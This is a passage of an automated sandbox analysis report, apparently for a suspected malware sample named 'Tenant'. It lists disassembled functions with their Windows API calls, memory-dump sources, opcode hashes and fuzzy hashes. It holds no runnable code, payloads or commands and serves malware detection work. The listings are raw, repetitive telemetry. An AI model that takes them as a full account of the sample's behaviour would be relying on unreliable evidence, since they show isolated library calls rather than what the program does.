                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID: EA06
                                                                                        • API String ID: 4104443479-3962188686
                                                                                        • Opcode ID: c49df36bc74941aa7594382e2ec1298352819abee958ea443dc7d47193117f79
                                                                                        • Instruction ID: e970e92fec0c83eb19ccba2dcb4b822bf6c7b92937cf4f48050d01040fabfd8d
                                                                                        • Opcode Fuzzy Hash: c49df36bc74941aa7594382e2ec1298352819abee958ea443dc7d47193117f79
                                                                                        • Instruction Fuzzy Hash: A2415D31A042985BEF219B94C951BFF7FB98B5D350F584075F982E7287D6318D8483E2
                                                                                        Function 00B1E139 Relevance: 3.2, APIs: 2, Instructions: 227COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _strcat.LIBCMT ref: 00B1E20C
                                                                                          • Part of subcall function 00AA4D37: __itow.LIBCMT ref: 00AA4D62
                                                                                          • Part of subcall function 00AA4D37: __swprintf.LIBCMT ref: 00AA4DAC
                                                                                        • _wcscpy.LIBCMT ref: 00B1E29B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: __itow__swprintf_strcat_wcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 1012013722-0
                                                                                        • Opcode ID: b34f1cdbd492ba9d196597df8de63c3108e4270b373b5aa73d8d582893e9b22c
                                                                                        • Instruction ID: 92eb9fd481429eb59a44795904c967b414129f0c4e48edac97d93a9c08577ad5
                                                                                        • Opcode Fuzzy Hash: b34f1cdbd492ba9d196597df8de63c3108e4270b373b5aa73d8d582893e9b22c
                                                                                        • Instruction Fuzzy Hash: 19913835A00604DFCB19DF28D5819A9B7E5EF59310B95809AFC2A9F3A2DB30ED41CB84
                                                                                        Function 00B06818 Relevance: 3.2, APIs: 2, Instructions: 216COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memmove.LIBCMT ref: 00B068EC
                                                                                        • _memmove.LIBCMT ref: 00B0690A
                                                                                          • Part of subcall function 00B06A73: _memmove.LIBCMT ref: 00B06B01
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID:
                                                                                        • API String ID: 4104443479-0
                                                                                        • Opcode ID: cdc4ee5d02bcf24afdfa95328405049782ae6d8391ea2411472e0393a9e56d22
                                                                                        • Instruction ID: b36ab7f96842a2788fa56ab2128ab7b911279b8c1a93ada50237ae935b7cc9cc
                                                                                        • Opcode Fuzzy Hash: cdc4ee5d02bcf24afdfa95328405049782ae6d8391ea2411472e0393a9e56d22
                                                                                        • Instruction Fuzzy Hash: 9D71E2706006049FDB24AF14C885B6ABFE5EF99320F24C58DF8D52B2C2CB35AD61CB90
                                                                                        Function 00B06135 Relevance: 3.1, APIs: 2, Instructions: 142COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CharLowerBuffW.USER32(?,?), ref: 00B0614E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharLower
                                                                                        • String ID:
                                                                                        • API String ID: 2358735015-0
                                                                                        • Opcode ID: 366578e476b86e67fe9650d0d45a0b93c406625375ffc830c0be49c19767585e
                                                                                        • Instruction ID: 443a0fe62acf855c1bde449cefec12a22d0a070608ab08e0dba2c33bd528af85
                                                                                        • Opcode Fuzzy Hash: 366578e476b86e67fe9650d0d45a0b93c406625375ffc830c0be49c19767585e
                                                                                        • Instruction Fuzzy Hash: 8841B6B6A00209AFDB15DFA4C8919AEBBFCFF44350B10856EE516D7281EB30DE50CB50
                                                                                        Function 00AB5F8B Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • IsThemeActive.UXTHEME ref: 00AB5FEF
                                                                                          • Part of subcall function 00AC359C: __lock.LIBCMT ref: 00AC35A2
                                                                                          • Part of subcall function 00AC359C: DecodePointer.KERNEL32(00000001,?,00AB6004,00AF8892), ref: 00AC35AE
                                                                                          • Part of subcall function 00AC359C: EncodePointer.KERNEL32(?,?,00AB6004,00AF8892), ref: 00AC35B9
                                                                                          • Part of subcall function 00AB5F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00AB5F18
                                                                                          • Part of subcall function 00AB5F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00AB5F2D
                                                                                          • Part of subcall function 00AB5240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00AB526C
                                                                                          • Part of subcall function 00AB5240: IsDebuggerPresent.KERNEL32 ref: 00AB527E
                                                                                          • Part of subcall function 00AB5240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00AB52E6
                                                                                          • Part of subcall function 00AB5240: SetCurrentDirectoryW.KERNEL32(?), ref: 00AB5366
                                                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00AB602F
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                        • String ID:
                                                                                        • API String ID: 1438897964-0
                                                                                        • Opcode ID: d3549bf27b6a279e6f5742be1390b72ee701db92e23ec0e591c377e858e6cd59
                                                                                        • Instruction ID: 052887769551bdfb9aff4fea4706c9bd1173741f45d1912e3a4b5f19c764146f
                                                                                        • Opcode Fuzzy Hash: d3549bf27b6a279e6f5742be1390b72ee701db92e23ec0e591c377e858e6cd59
                                                                                        • Instruction Fuzzy Hash: 501189718183059BC711EF79EE55A4ABBE8FF89714F008A1EF044872A2DFB49944CF92
                                                                                        Function 00AC0FE6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AC593C: __FF_MSGBANNER.LIBCMT ref: 00AC5953
                                                                                          • Part of subcall function 00AC593C: __NMSG_WRITE.LIBCMT ref: 00AC595A
                                                                                          • Part of subcall function 00AC593C: RtlAllocateHeap.NTDLL(01110000,00000000,00000001,?,00000004,?,?,00AC1003,?), ref: 00AC597F
                                                                                        • std::exception::exception.LIBCMT ref: 00AC101C
                                                                                        • __CxxThrowException@8.LIBCMT ref: 00AC1031
                                                                                          • Part of subcall function 00AC87CB: RaiseException.KERNEL32(?,?,?,00B5CAF8,?,?,?,?,?,00AC1036,?,00B5CAF8,?,00000001), ref: 00AC8820
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 3902256705-0
                                                                                        • Opcode ID: 30562a4101504faae809b5b1d1c16f2b18323c08016abdef71610826f5f8590c
                                                                                        • Instruction ID: 5e4ce7eec66b6ab8f4c8de0fc55177af28adb0fe5a59c9059e367028a2941aa3
                                                                                        • Opcode Fuzzy Hash: 30562a4101504faae809b5b1d1c16f2b18323c08016abdef71610826f5f8590c
                                                                                        • Instruction Fuzzy Hash: A4F0A93560421DB6CB20AB58ED15FDE7BECAF01710F6104ADF81496191DF719BC0C6D4
                                                                                        Function 00AC581D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: __lock_file_memset
                                                                                        • String ID:
                                                                                        • API String ID: 26237723-0
                                                                                        • Opcode ID: 825f8137eb7fea08b4d2ce2cced1e34e15be45d0e1b6d332bd9f5cd55f2e3be2
                                                                                        • Instruction ID: a6f51072753e00dcbd2a25f6685514a895fc7549a10e27cc8d0c4075c6650cc8
                                                                                        • Opcode Fuzzy Hash: 825f8137eb7fea08b4d2ce2cced1e34e15be45d0e1b6d332bd9f5cd55f2e3be2
                                                                                        • Instruction Fuzzy Hash: 54017175C00648EBCF11AF79CE01E9E7B61BF80360F1A811DB8241A1A1DB358A91EB91
                                                                                        Function 00AC55C6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AC8D58: __getptd_noexit.LIBCMT ref: 00AC8D58
                                                                                        • __lock_file.LIBCMT ref: 00AC560B
                                                                                          • Part of subcall function 00AC6E3E: __lock.LIBCMT ref: 00AC6E61
                                                                                        • __fclose_nolock.LIBCMT ref: 00AC5616
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                        • String ID:
                                                                                        • API String ID: 2800547568-0
                                                                                        • Opcode ID: 0a835709219d9f99429c38025a6af5a99af9078fea399495a8dd0e1b46bd1daa
                                                                                        • Instruction ID: d9bf13eb2925ce716b393276dfcedf4f602f3dac7ad1e06d3c807db7d77d1596
                                                                                        • Opcode Fuzzy Hash: 0a835709219d9f99429c38025a6af5a99af9078fea399495a8dd0e1b46bd1daa
                                                                                        • Instruction Fuzzy Hash: F2F09071D01B099ADB11AB798A02F6E67E1AF40331F17824DF424AB1C1CB7C69819F51
                                                                                        Function 00AC5E80 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __lock_file.LIBCMT ref: 00AC5EB4
                                                                                        • __ftell_nolock.LIBCMT ref: 00AC5EBF
                                                                                          • Part of subcall function 00AC8D58: __getptd_noexit.LIBCMT ref: 00AC8D58
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                                        • String ID:
                                                                                        • API String ID: 2999321469-0
                                                                                        • Opcode ID: 283d5176d318a73a9f4f6f5682c2f3e92d5131aed03d14d4c2b6a195d975568a
                                                                                        • Instruction ID: 0a3623c66e2c949b4c91d96103dea7cfb30ff4d9958702dd7da99a98911839d6
                                                                                        • Opcode Fuzzy Hash: 283d5176d318a73a9f4f6f5682c2f3e92d5131aed03d14d4c2b6a195d975568a
                                                                                        • Instruction Fuzzy Hash: 88F0A071D11A159ADB00BB798A02F5E76A07F01331F23424EB420AB1D2CFBC9E829B95
                                                                                        Function 00AB5AC3 Relevance: 3.0, APIs: 2, Instructions: 25windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00AB5AEF
                                                                                        • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00AB5B1F
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconNotifyShell__memset
                                                                                        • String ID:
                                                                                        • API String ID: 928536360-0
                                                                                        • Opcode ID: 406dd640a88fd0f11585aaa365721de0beabae4a01fd4e32af92e13594e820ef
                                                                                        • Instruction ID: 748227ebcc1c1c9a78b0d02dbb0416f1f892fe0e568ceea712d4154a3d47346a
                                                                                        • Opcode Fuzzy Hash: 406dd640a88fd0f11585aaa365721de0beabae4a01fd4e32af92e13594e820ef
                                                                                        • Instruction Fuzzy Hash: CEF0A7718183089FD7929B24DC45BD57BBC970130CF0001E9EA4897292DFB54B88CF51
                                                                                        Function 00B1C355 Relevance: 1.8, APIs: 1, Instructions: 288COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: LoadString$__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 207118244-0
                                                                                        • Opcode ID: a5d1655d50c13511099f0c7a3d6c14d79e35a1abbfd1a188a10bf9be3a77ed84
                                                                                        • Instruction ID: 3178a5b1d507c98738fc84351ec0de2df95df128b26412d46d2afc5c46ab9723
                                                                                        • Opcode Fuzzy Hash: a5d1655d50c13511099f0c7a3d6c14d79e35a1abbfd1a188a10bf9be3a77ed84
                                                                                        • Instruction Fuzzy Hash: 76B16A35A4010AEFCF14DF94D8919EEBBB5FF58310F50815AF915AB291EB70AA81CB90
                                                                                        Function 00AAA820 Relevance: 1.7, APIs: 1, Instructions: 193COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6c00e00610a2f6b5b9c75c50a0c0d75d754e7477f8d5fd79ed90822e01c4b6f7
                                                                                        • Instruction ID: fe9e6e39a2125997a2c103634a94fbc1181b544d45a2b7f5e6262607f4b83a27
                                                                                        • Opcode Fuzzy Hash: 6c00e00610a2f6b5b9c75c50a0c0d75d754e7477f8d5fd79ed90822e01c4b6f7
                                                                                        • Instruction Fuzzy Hash: 366198706002069FDB10DF64C981B7BB7F9EF5A300F15856DE91A9B291E774ED80CB92
                                                                                        Function 00AB343F Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID:
                                                                                        • API String ID: 4104443479-0
                                                                                        • Opcode ID: 719ee5b0fa6b9ba4850e2a8071915d723d28199ea914ec437d6a439a6195b7a7
                                                                                        • Instruction ID: f9470f4b7a9d83a3919b0ae075e89002c22a1a798e0f36c068fc00d04892f5c3
                                                                                        • Opcode Fuzzy Hash: 719ee5b0fa6b9ba4850e2a8071915d723d28199ea914ec437d6a439a6195b7a7
                                                                                        • Instruction Fuzzy Hash: EB31BE76204602DFCB24DF18D580A65F7A8FF08310714C66DE99A8B752DB30EC81CB84
                                                                                        Function 00ADE2DF Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClearVariant
                                                                                        • String ID:
                                                                                        • API String ID: 1473721057-0
                                                                                        • Opcode ID: 9b190d9a0a020fb9ab5dd1bb84df7dfbbc9bb94d6aa7cd589487aa5302cf5a66
                                                                                        • Instruction ID: 170de9195585b9dec81fbbbde0b45bc6790ca87cfab4e1c5d75f060583c004ba
                                                                                        • Opcode Fuzzy Hash: 9b190d9a0a020fb9ab5dd1bb84df7dfbbc9bb94d6aa7cd589487aa5302cf5a66
                                                                                        • Instruction Fuzzy Hash: 83410674508341CFDB14DF14C584B1ABBE1BF45308F1989ACE88A8B3A2C335E885CF52
                                                                                        Function 00AB49C2 Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AB4B29: FreeLibrary.KERNEL32(00000000,?), ref: 00AB4B63
                                                                                          • Part of subcall function 00AC547B: __wfsopen.LIBCMT ref: 00AC5486
                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00AB27AF,?,00000001), ref: 00AB49F4
                                                                                          • Part of subcall function 00AB4ADE: FreeLibrary.KERNEL32(00000000), ref: 00AB4B18
                                                                                          • Part of subcall function 00AB48B0: _memmove.LIBCMT ref: 00AB48FA
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$Free$Load__wfsopen_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 1396898556-0
                                                                                        • Opcode ID: a7b3bb18fdd4bde78d2999ae1abc6729ba6b8154c63e523bfa0c48c6508bd3e7
                                                                                        • Instruction ID: 3c61ad2ba89d17171ae4e23c46882877eeffa66f3d3bc29ddebd86357cfe6929
                                                                                        • Opcode Fuzzy Hash: a7b3bb18fdd4bde78d2999ae1abc6729ba6b8154c63e523bfa0c48c6508bd3e7
                                                                                        • Instruction Fuzzy Hash: 16112731650209BBCB10FB70CD12FEE77AD9F48781F10442DF581A6193EE719A10AB94
                                                                                        Function 00AB1BCC Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID:
                                                                                        • API String ID: 4104443479-0
                                                                                        • Opcode ID: d3511936f2c3a9f0ed1f08c39fcca023c8dcb164a1ab07be1a9a79502957a79d
                                                                                        • Instruction ID: 3728121abbfeba1051542a04e818b74e076f5dbd8eba4fbafcf45db726d47895
                                                                                        • Opcode Fuzzy Hash: d3511936f2c3a9f0ed1f08c39fcca023c8dcb164a1ab07be1a9a79502957a79d
